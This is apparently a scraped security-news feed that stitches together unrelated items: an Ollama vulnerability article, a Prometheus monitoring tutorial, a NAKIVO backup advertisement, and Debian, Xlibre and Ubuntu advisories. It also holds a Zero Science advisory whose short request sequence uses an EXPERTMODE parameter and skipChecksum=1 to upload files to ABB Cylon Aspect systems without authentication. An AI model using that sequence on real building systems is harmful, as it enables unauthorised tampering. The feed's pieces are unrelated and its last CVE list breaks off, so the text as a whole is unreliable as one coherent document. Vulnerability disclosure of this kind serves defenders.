khugepaged in Linux races with rmap-based zap, races with GUP-fast, and fails to call MMU notifiers.

Linux khugepaged Race Conditions

Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that could be exploited by a malicious actor to perform various actions, including denial-of-service, model poisoning, and model theft.
"Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including

Vulnerability / Cyber Threat

Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that could be exploited by a malicious actor to perform various actions, including denial-of-service, model poisoning, and model theft.

"Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including denial-of-service (DoS) attacks, model poisoning, model theft, and more," Oligo Security researcher Avi Lumelsky said in a report published last week.

Ollama is an open-source application that allows users to deploy and operate large language models (LLMs) locally on Windows, Linux, and macOS devices. Its project repository on GitHub has been forked 7,600 times to date.

A brief description of the six vulnerabilities is below -

*   **CVE-2024-39719** (CVSS score: 7.5) - A vulnerability that an attacker can exploit using /api/create an endpoint to determine the existence of a file in the server (Fixed in version 0.1.47)
*   **CVE-2024-39720** (CVSS score: 8.2) - An out-of-bounds read vulnerability that could cause the application to crash by means of the /api/create endpoint, resulting in a DoS condition (Fixed in version 0.1.46)
*   **CVE-2024-39721** (CVSS score: 7.5) - A vulnerability that causes resource exhaustion and ultimately a DoS when invoking the /api/create endpoint repeatedly when passing the file "/dev/random" as input (Fixed in version 0.1.34)
*   **CVE-2024-39722** (CVSS score: 7.5) - A path traversal vulnerability in the api/push endpoint that exposes the files existing on the server and the entire directory structure on which Ollama is deployed (Fixed in version 0.1.46)
*   A vulnerability that could lead to model poisoning via the /api/pull endpoint from an untrusted source (No CVE identifier, Unpatched)
*   A vulnerability that could lead to model theft via the /api/push endpoint to an untrusted target (No CVE identifier, Unpatched)

For both unresolved vulnerabilities, the maintainers of Ollama have recommended that users filter which endpoints are exposed to the internet by means of a proxy or a web application firewall.

"Meaning that, by default, not all endpoints should be exposed," Lumelsky said. "That's a dangerous assumption. Not everybody is aware of that, or filters http routing to Ollama. Currently, these endpoints are available through the default port of Ollama as part of every deployment, without any separation or documentation to back it up."

Oligo said it found 9,831 unique internet-facing instances that run Ollama, with a majority of them located in China, the U.S., Germany, South Korea, Taiwan, France, the U.K., India, Singapore, and Hong Kong. One out of four internet-facing servers has been deemed vulnerable to the identified flaws.

The development comes more than four months after cloud security firm Wiz disclosed a severe flaw impacting Ollama (CVE-2024-37032) that could have been exploited to achieve remote code execution.

"Exposing Ollama to the internet without authorization is the equivalent to exposing the docker socket to the public internet, because it can upload files and has model pull and push capabilities (that can be abused by attackers)," Lumelsky noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaws in Ollama AI Framework Could Enable DoS, Model Theft, and Poisoning

As data and usage grow, apps adopt distributed microservices with load balancers for scalability. Monitoring error rates, resource…

As data and usage grow, apps adopt distributed microservices with load balancers for scalability. Monitoring error rates, resource use, and replica health across instances is crucial. Tools like Prometheus aid in ensuring uptime and performance.

As internet users and data proliferate at an unprecedented rate, modern applications and services have surpassed the capabilities of single-server deployments. To accommodate the escalating demands of their expanding user bases, contemporary applications are increasingly adopting a distributed microservices architecture. 

A common pattern for synchronous microservices involves deploying multiple replicas behind a load balancer. Users and client services send requests to the load balancer, which routes each request to one of the available replicas. While this approach enhances scalability and fault tolerance, it introduces monitoring challenges not present in single-node systems.

In a single-node environment, operators can directly observe requests and monitor the health of the node using tools like the Linux top utility. This allows for straightforward scaling decisions and issue detection. However, this methodology does not scale when dealing with microservices comprising hundreds of replicas. 

In this article, we explore various failure modes in distributed microservices and discuss approaches to proactively monitor them, ensuring consistent uptime for upstream users and clients.

****Challenge #1:  Aggregate error and fault rate of the service****

Faults in a microservice can include requests that result in unexpected responses or server-side errors, such as HTTP 5xx response codes. Monitoring these faults is crucial for maintaining the reliability and performance of your service. In a distributed system with multiple replicas, it’s important to aggregate fault metrics across all instances to get a holistic view of the service’s health.

****General Approach to Monitoring Fault Rates****

*   **Metric Emission**: Each service replica should emit metrics related to the response codes it generates. This includes counts of successful responses, client errors (HTTP 4xx), and server errors (HTTP 5xx).
*   **Aggregation**: Collect and aggregate these metrics across all replicas to calculate the overall fault rate of the service. This helps identify systemic issues affecting the service as a whole.
*   **Visualization and Alerting**: Use a monitoring system to visualize fault rates over time and set up alerts that notify operators when fault rates exceed acceptable thresholds.

****Monitoring Fault Rates Using Tools****

Prometheus is a popular open-source monitoring system that can collect and aggregate metrics from your microservice replicas. Prometheus is just one tool that we’ll use as an example, but the general approach is the same. 

**Aggregate Metrics**: Prometheus scrapes the metrics from all replicas and can aggregate them.

Example Prometheus query to get the aggregate rate of HTTP 5xx errors across all replicas:

sum(rate(http_requests_total{code=~"5.."}))

**Drill Down into Faulty Replicas**: To identify which replicas are experiencing the most faults, you can group the metrics by the instance label.

rate(http_requests_total{code=~"5.."}) by (instance)

This shows the rate of 5xx errors per instance over the last five minutes.

**Monitoring Client Errors (HTTP 4xx)**

While HTTP 4xx response codes indicate client-side errors, an unexpected increase might signal issues such as:

*   **API Misuse**: Clients are not using the API correctly.
*   **Documentation Errors**: Incorrect or outdated API documentation leading to improper client requests.
*   **Service Bugs**: Logic errors in the service that misclassify responses.

Monitoring and analyzing these errors can help improve both the service and client integrations.

****Challenge #2:  Resource utilization issues** **

**Importance of Monitoring CPU and Memory Usage**

Monitoring resource utilization metrics like CPU and memory usage is essential for:

*   **Preventing Performance Degradation**: High resource usage can lead to increased response times or service unavailability.
*   **Detecting Memory Leaks**: Gradual increases in memory usage may indicate memory leaks, which can cause crashes.
*   **Scaling Decisions**: Understanding resource usage patterns aids in capacity planning and scaling strategies.

In a distributed environment, resource issues on individual replicas can impact overall service performance, especially if multiple replicas experience issues simultaneously.

****General Approach to Monitoring Resource Utilization****

*   **Per-Replica Metrics**: Each replica should expose its CPU and memory usage metrics.
*   **Aggregated View**: Collect these metrics to analyze resource utilization trends across all replicas.
*   **Thresholds and Alerts**: Define acceptable resource usage thresholds and set up alerts for when these thresholds are breached.

****Monitoring Resource Utilization Using Prometheus****

Tools like Prometheus can collect and aggregate resource utilization metrics from each replica. Again, you can use any monitoring tool of your choice but we’ll use Prometheus as an example. 

**CPU Utilization per Replica**:

rate(process_cpu_seconds_total) by (instance)

This calculates the average CPU usage per instance over the last five minutes.

**Aggregate CPU Utilization**:

Set up alerts to notify operators when resource usage exceeds defined thresholds, enabling proactive mitigation.

****Challenge #3:  Unhealthy replicas****

Hardware faults and crashes are inevitable in large-scale distributed systems. A single replica crashing might not impact the overall service, but simultaneous failures of multiple replicas can compromise service availability.

**General Approach to Monitoring Replica Health**

*   **Health Checks**: Implement regular health checks for each replica to determine its operational status.
*   **Load Balancer Monitoring**: Use the load balancer’s perspective to monitor the health of backend replicas.
*   **Replica Counts**: Keep track of the total number of healthy versus unhealthy replicas.

****Monitoring Unhealthy Replicas from the Load Balancer’s Perspective****

Load balancers often perform periodic health checks on backend replicas and can provide metrics on their status.

Steps to monitor unhealthy replicas:

*   **Enable Health Check Metrics**: Configure the load balancer to expose metrics about the health of each replica.
*   **Collect Metrics**: Use a monitoring system to collect these metrics.
*   **Analyze and Alert**: Monitor the number of unhealthy replicas and set up alerts if the count exceeds a certain threshold.

**Example Using tools like Prometheus**

If your load balancer exposes metrics, you can collect and analyze them.

**Example queries:**

**Count of Healthy Replicas**:

sum(loadbalancer_backend_up{backend="myservice"})

Assuming loadbalancer\_backend\_up is a metric indicating if a backend is up (1) or down (0).

**Identifying Unhealthy Replicas**:

loadbalancer_backend_up{backend="myservice"} == 0

*   This query lists all replicas that are currently down.

**Summary**

Effective monitoring of distributed microservices is vital for ensuring high availability and performance in today’s scalable applications. By aggregating metrics across all service replicas and employing robust monitoring tools, operators can gain deep insights into the system’s health.

Proactive monitoring of error rates, resource utilization, and replica health enables timely detection and resolution of issues, minimizing the impact on end-users. Implementing comprehensive monitoring strategies not only helps maintain service reliability but also contributes to better capacity planning and resource optimization.

As distributed systems continue to grow in complexity, embracing robust monitoring solutions becomes increasingly important. By leveraging both general monitoring principles and specific tools, organizations can enhance their operational capabilities and deliver consistent, high-quality services to their users.

**References**

_Monitoring for Distributed and Microservices Deployments_ – DigitalOcean: https://www.digitalocean.com/community/tutorials/monitoring-for-distributed-and-microservices-deployments

1.  **The Best Ways to Automate SBOM Creation**
2.  **Relevance of CI/CD Practices in IT Software Delivery**
3.  **Building Your First Web Application with Yii Framework**
4.  **Transform Your CAD Workflow with Parametric Modeling**
5.  **Power of Cloud App Development, DevOps for Businesses**
6.  **Efficiency in a Virtualized World: A Deep Dive into Modern IT**

Monitoring Distributed Microservices

Explore the features of the NAKIVO MSP backup solution. Choose the best MSP backup software to protect client…

Explore the features of the NAKIVO MSP backup solution. Choose the best MSP backup software to protect client data across multiple platforms efficiently. 

****The NAKIVO Backup Solution for MSPs: Data Protection for VMware, Microsoft 365, Proxmox and More** **

The growing demand for reliable data backup among individuals and organizations is simultaneously an opportunity and a challenge for managed service providers (MSPs). On one hand, finding the best MSP backup solution for multiple IT platforms can help expand the client base and increase revenue. On the other hand, the need to protect several environments can complicate management and impact the service quality.

MSPs need a comprehensive set of data protection functions with convenient management capabilities for multiple environments including VMware, Microsoft 365 and Proxmox. The NAKIVO backup solution for MSPs provides up-to-date functionality, extended compatibility, streamlined management, ultimate scalability, and flexible licensing.

****NAKIVO: The Best MSP Backup and Recovery Solution** **

The NAKIVO backup solution for MSP allows you to deliver robust data protection services, including backup-as-a-service (BaaS) and disaster-recovery-as-a-service (DraaS), for client infrastructures of any type, size and complexity. The features developed specifically for managed service providers enable seamless data protection and convenient management. Download the Free Trial and get 15 days to try the solution without feature or capacity limitations.

****MSP Backup and Recovery for VMware Environments****

NAKIVO backup solution for MSP enables you to provide efficient managed online backup services for VMware workloads. You can store backups of VMware VMs and data locally or send them offsite to Amazon S3, Wasabi, Azure Blob, Backblaze B2 or any other S3-compatible storage. NAS and tape destinations are also available.

The most noteworthy features are: 

*   Native integration with VMware’s Changed Block Tracking (CBT) for incremental backups.
*   Flash VM Boot – boot VMware virtual machines to original or custom hosts directly from backups for instant recovery.
*   Replication from backup – perform incremental replication from backups to offload production environments.
*   Real-Time ReplicationBETA – create exact copies of VMs and continuously update them to ensure near-instant RPOs.
*   Automated Failover – configure failover to replicas and launch presets once an incident occurs, achieving near-zero RTOs.
*   Physical-to-virtual recovery (P2V) – restore Windows and Linux machines as VMware vSphere VMs.
*   Cross-platform recovery – recover Hyper-V VMs as VMware workloads and vice versa. 

Use the NAKIVO Backup solution for MSPs to enable reliable backup and swift, flexible recovery of client VMware infrastructures, VMs and data items. 

****Microsoft 365 Data Protection: Backup as a Service for Office 365****

NAKIVO provides SaaS backup functionality to protect Microsoft 365 data. The solution enables: 

*   Backups of Microsoft 365 data, including Exchange Online, OneDrive for Business, SharePoint Online and Microsoft Teams.
*   Onsite Microsoft 365 backup storage for data availability and resilience to cyber threats.
*   Using Microsoft’s native change tracking technology for Exchange Online and Teams to accelerate backup workflows and optimize storage space usage.
*   Fast granular recovery – near-instant recovery of the required items without restoring an entire user account.
*   Retention flexibility – custom retention policies with recovery points rotated daily, weekly, monthly or yearly to store data for as long as you need

NAKIVO Backup solution for MSPs makes data protection in Microsoft 365 straightforward, ensuring SaaS data availability, business continuity and compliance for your clients.

****Proxmox Backup and Recovery: A New Frontier for MSPs****

With the latest update, NAKIVO’s backup as a service solution now supports agent-based backup and recovery for Proxmox VE. The available Proxmox data protection functionality includes the following: 

*   Fast, incremental and app-aware backups of Proxmox VMs.
*   Backup data tiering with multiple destinations including onsite, offsite, public cloud, NAS, deduplication appliances or tape storage.
*   Immutable storage, data encryption, role-based access control and two-factor authentication to protect Proxmox backup data from ransomware and unauthorized access.
*   Full VM recovery or granular recovery of individual files, folders and app objects to original or custom locations.

NAKIVO Backup for MSPs allows you to offer your clients several backups as a service benefit such as affordability and delegated administration combined with the free Proxmox hypervisor. This brings enhanced data availability and infrastructure resilience while maintaining the initial cost-efficiency of systems for clients.

****NAKIVO Backup Solution for MSPs: Versatility Across Environments****

With the NAKIVO solution, you can deliver managed backup as a service for physical, virtual, cloud, SaaS and hybrid environments, including:   

*   NAS
*   File shares
*   Proxmox VE
*   Nutanix AHV
*   Oracle RMAN
*   Microsoft Hyper-V
*   AWS EC2 instances
*   VMware vSphere and Cloud Director
*   Windows and Linux physical servers and workstations 

The wide range of supported environments allows you to easily and quickly cater to the unique needs of every client. With a single MSP backup solution to serve all clients, you can minimize management overhead, increase productivity and scale your business with ease. 

****Ransomware Protection and Advanced Security for MSPs****

Reliable solutions that offer backup and disaster recovery as a service should prioritize threat protection over prevention, enabling clients to restore data even in worst-case scenarios. The NAKIVO solution provides:

*   Immutable storage – enables immutability for local and cloud repositories to protect backup data from change or deletion by ransomware.
*   Malware scan – check your backups before recovery to ensure they don’t contain malware.
*   AES-256 encryption – enables encryption for backup data both during transfer and retention to prevent third-party access. 
*   Role-based access control (RBAC) – limit backup and recovery operations to specific users and ensure authorized access to data protection activities.
*   Direct Connect – connect to clients’ remote resources via a secure port channel without the need to establish and maintain a VPN.

With the NAKIVO backup solution for MSPs, you can ensure client data availability and recoverability when other cybersecurity measures fail. 

****Ease of Management and Automation for MSPs****

Streamlining management and workflow automation are key to efficient MSP backup and recovery. The solution from NAKIVO includes:

*   Multi-tenant mode – create isolated environments for up to 100 clients (tenants) with a single solution deployment.
*   Tenant resource allocation – flexibly allocate VMs, hosts, clusters, backup repositories and other resources in your infrastructure to tenants.
*   MSP Console – uses a unified and intuitive web interface to manage remote client environments from a single panel.
*   Self-service portal – allows clients to manage their own data protection activities.
*   Automation and scheduling – schedule custom backup and recovery workflows from the centralized panel to avoid overlaps and resource bottlenecks.
*   Policy-based data protection – set up policy rules to automatically back up or replicate machines that match the criteria you define.
*   Backup verification – receive verification reports or OS screenshots to verify that backups are recoverable. 
*   Site Recovery – create presets to automate and orchestrate complex disaster recovery sequences and restore entire environments in just a few clicks.
*   Non-disruptive DR testing – run disaster recovery tests by schedule or on demand without disrupting production networks.

Use the advanced management, automation and scheduling capabilities of the NAKIVO solution to adjust to every client’s needs. Ensure data security in the most dynamic and ramified environments.

****MSP Backup Pricing and Cost Efficiency****

NAKIVO offers convenient licensing for managed service providers. This means:

*   5 editions with different feature sets – pick the edition that suits your offering.
*   Perpetual or subscription-based license – choose the one that maximizes your profits.
*   Per-workload pricing – ensure there are no upfront fees or extra costs for unused capacity.
*   Monthly and annual subscription – pay monthly for added flexibility or annually for sizable discounts and additional savings.
*   24/7 vendor support – get in touch with NAKIVO experts whenever you need to guarantee service quality and meet SLAs. 
*   MSP Partner Program – receive certification, training and free marketing support from NAKIVO. 

You can leverage these benefits to increase your business efficiency and win more clients. Provide quality services at affordable costs to boost your revenue.

****Conclusion****

The NAKIVO solution enables efficient MSP backup and recovery for VMware, Microsoft 365, Proxmox VE and other platforms. Install the Free Trial to test the solution’s data protection management, recovery and cybersecurity capabilities in your environment. With NAKIVO, you can provide the best MSP backup solution, meet client needs, cut costs by up to 50%, increase productivity and grow your profit.  

1.  **How To Create a Complete GitHub Backup**
2.  **Recover Lost Data with Mac Data Recovery Software**
3.  **How to Recover Illustrator Files on Windows and Mac**
4.  **Microsoft Planner Backup – Restore: Guide to Data Protection**
5.  **Insights on Google Cloud Backup & Disaster Recovery Service**

NAKIVO Backup for MSP: Best Backup Solution for MSPs

ABB Cylon Aspect version 3.08.01 has a vulnerability in caldavInstall.php, caldavInstallAgendav.php, and caldavUpload.php files, where the presence of an EXPERTMODE parameter activates a badassMode feature. This mode allows an unauthenticated attacker to bypass MD5 checksum validation during file uploads. By enabling badassMode and setting the skipChecksum parameter, the system skips integrity verification, allowing attackers to upload or install altered CalDAV zip files without authentication. This vulnerability permits unauthorized file modifications, potentially exposing the system to tampering or malicious uploads.

    ABB Cylon Aspect 3.08.01 (badassMode) File Upload MD5 Checksum BypassVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS system has a vulnerability in caldavInstall.php,caldavInstallAgendav.php, and caldavUpload.php files, where the presenceof an EXPERTMODE parameter activates a badassMode feature. This mode allowsan unauthenticated attacker to bypass MD5 checksum validation during fileuploads. By enabling badassMode and setting the skipChecksum parameter, thesystem skips integrity verification, allowing attackers to upload or installaltered CalDAV zip files without authentication. This vulnerability permitsunauthorized file modifications, potentially exposing the system to tamperingor malicious uploads.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5860Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5860.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ head caldavInstall.php caldavInstallAgendav.php==> caldavInstall.php <==<?php$badassMode = false;if (isset($_GET["EXPERTMODE"])) {    $badassMode = true;}?><html><head>==> caldavInstallAgendav.php <==<?php$badassMode = false;if (isset($_GET["EXPERTMODE"])) {    $badassMode = true;}?><html><head>1. GET /caldavInstall.php?EXPERTMODE (FE)2. GET /caldavInstallAgendav.php?EXPERTMODE (FE)3. POST /caldavUpload.php -d "skipChecksum=1" (BE)

ABB Cylon Aspect 3.08.01 File Upload MD5 Checksum Bypass

Debian Linux Security Advisory 5801-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, cross-site scripting, spoofing or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5801-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 31, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-10458 CVE-2024-10459 CVE-2024-10460 CVE-2024-10461                  CVE-2024-10462 CVE-2024-10463 CVE-2024-10464 CVE-2024-10465                  CVE-2024-10466 CVE-2024-10467Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, cross-site scripting, spoofing or information disclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.4.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcjhjMACgkQEMKTtsN8TjbUdw/+M/mtjyJ4H/OjhGZdzDOsjIzCTR3FDRrNXuh7j7fjLcd+q6vSLrAZEqhFSnx2oJ3UtLX9IUxkfqBG425XZ1E3EPd9rxFuKy7uSHFqhbXp+h5sEahf3r9Jyf6v6JKfo7TBBZ/ycr3uix1GtFGcbhkrmXZuNWUuz33w4QQS+3O00Ukbsm6UhE4pdXHMnTesJN77kKRepX0W8/Y8wOg0+8MVBTBhKPfISf94x+shWxBpMrCj80lDvoZ6y3sO/VgtcwMBgcvo8le6nvetyzyOt2syiE65qFlMvSG9niT+1wdiv42tRMqjLwvfxF5GpkiFF8N7p6bD11SAxiywBU/60/WGTIE0MIWlifKzUeed5Xs84xk3mvKc8mZ9Z/WuGcIHJEY8tS1R8KcDfwnKRdYobtMyBUgb6WJNvobUWkGT3nS/ml2dSLs5Pjd3ulmMELhG0xsH+YuG0MceSFjuA9HJqCYZ3a/Q5i2jyUIj+RkivVxBVwsM5BYJlVYl7CaPTxbARJEK7QtjrURFnOu57M+T+AsNx+xjIRzouWN1bAXQT49VgViVFtH7jkpc1rbXV74s8IkYi50ED0Ny9rdN6HAahSlrt5TmIccYhaiQZCDEPAC5J6OpE30MXGoCAYcW2/4e9oiIwrVjw1m+ePt1U1yD+20k7i2W1LB2T0e7pwaFl2FgR+k==Tz4t-----END PGP SIGNATURE-----

Debian Security Advisory 5801-1

Xlibre Xnest versions 24.1.0 and 24.2.0 suffer from a buffer overflow vulnerability that affected Xorg.

    XLibre project security advisory---------------------------------As Xlibre Xnest is based on Xorg, it is affected by some security issueswhich recently became known in Xorg: CVE-2024-9632: can be triggered by providing a modified bitmap to theX.Org server. CVE-2024-9632: Heap-based buffer overflow privilege escalation in_XkbSetCompatMapSee:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9632Affected versions:  * 24.1.0  * 24.2.024.1.x release:   Repo:   https://gitlab.freedesktop.org/metux/xserver.git   Branch: xlibre/xnest/24.1   Tag:    xnest-24.1.1   SHA:    11450b0946c1035944c5946d665f21f83356b6b924.2.x release:   Repo:   https://gitlab.freedesktop.org/metux/xserver.git   Branch: xlibre/xnest/24.2   Tag:    xnest-24.2.1   SHA:    9a6aec9bf62b6bdd75795a5e28648d4af07fe413These bugfix branches also contain several other pointer and boundsrelated problems that haven't been rated as possibly exploitable yet,but no other unnecessary changes which don't fix actual bugs.All users are strongly advised to upgrade to the fixed mainenancereleases ASAP.--mtx-----Enrico Weigelt, metux IT consultFree software and Linux embedded engineeringinfo@metux.net -- +49-151-27565287

Xlibre Xnest 24.1.0 / 24.2.0 Buffer Overflow

Ubuntu Security Notice 7090-1 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7090-1November 01, 2024linux-azure-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-6.8: Linux kernel for Microsoft Azure cloud systemsDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-42064, CVE-2024-43858, CVE-2024-42251, CVE-2024-42113,CVE-2024-41020, CVE-2024-41093, CVE-2024-45016, CVE-2024-42150,CVE-2024-42069, CVE-2024-42157, CVE-2024-42126, CVE-2024-42144,CVE-2024-42093, CVE-2024-41035, CVE-2024-41032, CVE-2024-41077,CVE-2024-42097, CVE-2024-41071, CVE-2024-42227, CVE-2024-42253,CVE-2024-42237, CVE-2024-41060, CVE-2024-42080, CVE-2024-42068,CVE-2024-41058, CVE-2024-42140, CVE-2024-42231, CVE-2024-42127,CVE-2024-42243, CVE-2023-52887, CVE-2024-39486, CVE-2024-41063,CVE-2024-42128, CVE-2024-42074, CVE-2024-41028, CVE-2024-42110,CVE-2024-45001, CVE-2024-41090, CVE-2024-41084, CVE-2024-41088,CVE-2024-42118, CVE-2024-41094, CVE-2024-41091, CVE-2024-41007,CVE-2024-42280, CVE-2024-41044, CVE-2024-41012, CVE-2024-42063,CVE-2024-41078, CVE-2024-42082, CVE-2024-41055, CVE-2024-41031,CVE-2024-42142, CVE-2024-41083, CVE-2024-42145, CVE-2024-41039,CVE-2024-41019, CVE-2024-42149, CVE-2024-42248, CVE-2024-42111,CVE-2024-41074, CVE-2024-42096, CVE-2024-42100, CVE-2024-41010,CVE-2024-43855, CVE-2024-42136, CVE-2024-41054, CVE-2024-41053,CVE-2024-41061, CVE-2024-42104, CVE-2024-41025, CVE-2024-42129,CVE-2024-41086, CVE-2024-42133, CVE-2024-42115, CVE-2024-42158,CVE-2024-42091, CVE-2024-42088, CVE-2024-42161, CVE-2024-42236,CVE-2024-41065, CVE-2024-41062, CVE-2024-42153, CVE-2024-41030,CVE-2024-41079, CVE-2023-52888, CVE-2024-42223, CVE-2024-42119,CVE-2024-42238, CVE-2024-41052, CVE-2024-41064, CVE-2024-42138,CVE-2024-41081, CVE-2024-41034, CVE-2024-42147, CVE-2024-41095,CVE-2024-42132, CVE-2024-42137, CVE-2024-42106, CVE-2024-41041,CVE-2024-41073, CVE-2024-41033, CVE-2024-41075, CVE-2024-42112,CVE-2024-41070, CVE-2024-42234, CVE-2024-41027, CVE-2024-42105,CVE-2024-41089, CVE-2024-41098, CVE-2024-42152, CVE-2024-42101,CVE-2024-41050, CVE-2024-41069, CVE-2024-42120, CVE-2024-42130,CVE-2024-42084, CVE-2024-41066, CVE-2024-42108, CVE-2024-42087,CVE-2024-41067, CVE-2024-41023, CVE-2024-41046, CVE-2024-42079,CVE-2024-42065, CVE-2024-42098, CVE-2024-42070, CVE-2024-41076,CVE-2024-41082, CVE-2024-41096, CVE-2024-42235, CVE-2024-42085,CVE-2024-42246, CVE-2024-41049, CVE-2024-42076, CVE-2024-41048,CVE-2024-41038, CVE-2024-42241, CVE-2024-41092, CVE-2024-42114,CVE-2024-41036, CVE-2024-41047, CVE-2024-41029, CVE-2024-42092,CVE-2024-41068, CVE-2024-42067, 